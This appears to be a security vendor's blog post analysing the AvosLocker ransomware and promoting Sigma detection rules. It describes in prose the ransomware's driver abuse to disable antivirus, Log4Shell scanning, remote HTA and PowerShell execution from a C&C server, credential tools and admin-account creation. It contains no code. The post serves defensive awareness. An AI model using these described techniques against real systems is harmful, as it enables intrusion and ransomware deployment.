Detect AvosLocker Ransomware: Abuses a Driver File to Disable Anti-Virus Protection, Scans for Log4Shell Vulnerability

Recent cybersecurity research has uncovered AvosLocker ransomware samples abusing the Avast Anti-Rootkit Driver file to disable anti-virus, which allows adversaries to evade detection and block defense. AvosLocker is known to represent a relatively novel ransomware family that appeared in the cyber threat arena to replace the infamous REvil, which was one of the most active ransomware variants in 2021 until the official shutdown of its operators. 

In this latest cyber-attack, AvosLocker ransomware is also observed to weaponize a set of endpoints for Log4Shell, a notorious zero-day vulnerability in Apache Log4j Java logging library that has compromised hundreds of millions of devices across the globe. The ransomware enabled scanning for Log4Shell leveraging the malicious Nmap NSE script.

Detect AvosLocker Ransomware

The Sigma rules below, released by our perspicacious Threat Bounty developers Sittikorn Sangrattanapitak and Nattatorn Chuensangarun, allow for effortless detection of the latest attacks involving the AvosLocker ransomware:

Possible Trend Micro Apex One Termination on Windows (via process_creation)

Possible AvosLocker Ransomware Callback C&C Server via Log4Shell Vulnerability with NMAP Tool (via process_creation)

Possible Ransomware Persistence by Modifying Registry to Allows Automatic Login (via process_creation)

The increasing number and severity of ransomware incidents are creating an expanded attack surface, putting at risk more users each day. To stay up-to-date with detection content related to AvosLocker ransomware, register for the SOC Prime Platform. The View Detections button will take you to a wide library of dedicated rules translated to 25+ SIEM, EDR, and XDR solutions.

SOC Prime’s Threat Bounty Program welcomes both experienced and aspiring threat hunters to share their Sigma-based detection content in exchange for expert coaching and steady revenue.

View Detections Join Threat Bounty

AvosLocker Ransomware Analysis

First observed in July 2021 and acting as a Ransomware-as-a-Service (RaaS) model, AvosLocker ransomware targets food and beverage sectors, tech and finance industries, telecom and government entities, with India, Canada, and the U.S. being spotted as the top affected countries based on the malicious activity spanning half a year from July 2021 through February 2022. According to the joint Cybersecurity Advisory issued by FBI and FinCEN, AvosLocker ransomware has also hit critical U.S. infrastructure, including financial services and government entities.  

Based on the new research by Trend Micro security analysts, a new variant of AvosLocker ransomware began sweeping across the globe, standing out from other strains of this ransomware family as the first one to disable anti-virus solutions on the infected devices.

The most probable initial point of access is the Zoho ManageEngine ADSelfService Plus (ADSS) exploit. Upon the successful penetration, adversaries launch mshta.exe to remotely execute an HTML application (HTA) file from their C&C server. The HTA ran an obfuscated PowerShell script with a shellcode that allowed it to connect to the server and run arbitrary commands on a host operating system. Besides, PowerShell downloads and launches the remote desktop tool AnyDeskMSI, used to distribute ransomware payload and tools leveraged for further system compromise.

Apart from scanning for an infamous Log4Shell vulnerability, tracked as CVE-2021-44228, AvosLocker ransomware targets other unpatched vulnerabilities to penetrate a targeted network. This new variant of AvosLocker ransomware samples misuses a driver file (Avast Anti-Rootkit Driver) to disable anti-virus software to establish its stealthy presence. After disabling defense, the AvosLocker operators transfer other tools, including Mimikatz and Impacket.

Adversaries use PDQ, which is a software deployment tool to deliver a malicious batch script on a targeted system. The batch script has a broad range of features, including the ability to kill the processes of several Windows products, such as Windows Error Recovery or Windows Update, as well as prohibit security software safe boot execution, create a new admin account, and run the malicious code to spread infection.

To stay current with the events pertaining to the cybersecurity industry, follow the SOC Prime blog. Looking for a trustworthy platform to distribute your detection content while promoting collaborative cyber defense? Join SOC Prime’s crowdsourcing program to share your Sigma and YARA rules with the community, drive positive change in cybersecurity, and earn a stable income for your contribution!

Was this article helpful?

Like and share it with your peers.
Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Related Posts